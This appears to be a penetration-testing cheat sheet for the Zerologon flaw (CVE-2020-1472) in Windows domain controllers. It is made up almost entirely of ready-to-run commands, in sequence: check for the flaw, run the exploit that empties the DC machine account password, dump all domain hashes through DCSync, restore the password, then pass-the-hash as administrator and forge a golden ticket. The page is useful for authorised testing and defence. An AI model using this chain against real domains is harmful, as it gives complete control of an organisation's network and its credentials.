Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
CVE-2020-1472. Vulnerability in Netlogon protocol. Reset DC machine account password to empty → DCSync all hashes. Critical severity.
This attack changes the DC machine account password. Can break domain replication. Always restore original hash after exploitation.
Check Vulnerability
crackmapexec smb DC_IP -u '' -p '' -M zerologon
# https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py DC_HOSTNAME DC_IP
Exploit
Set Password to Empty
# https://github.com/dirkjanm/CVE-2020-1472
python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP
DCSync with Empty Password
impacket-secretsdump -no-pass -just-dc DOMAIN/'DC_HOSTNAME$'@DC_IP
Restore Machine Account Password
Get Original Hash First (From DCSync Output)
# Note the DC machine account hash from secretsdump output
# DC_HOSTNAME$:NTLM_HASH
Restore
# https://github.com/dirkjanm/CVE-2020-1472
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD
Alternative — secretsdump to Get Hex
impacket-secretsdump -no-pass DOMAIN/'DC_HOSTNAME$'@DC_IP -just-dc-user 'DC_HOSTNAME$'
Post-Exploitation
After DCSync:
# PtH as Domain Admin
impacket-psexec DOMAIN/administrator@DC_IP -hashes :NTLM_HASH
# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN administrator
Quick Reference
| Step | Command |
|---|
| Check | crackmapexec smb DC -M zerologon |
| Exploit | python3 cve-2020-1472-exploit.py DC_NAME DC_IP |
| DCSync | secretsdump -no-pass DOMAIN/'DC$'@DC_IP |
| Restore | python3 restorepassword.py ... |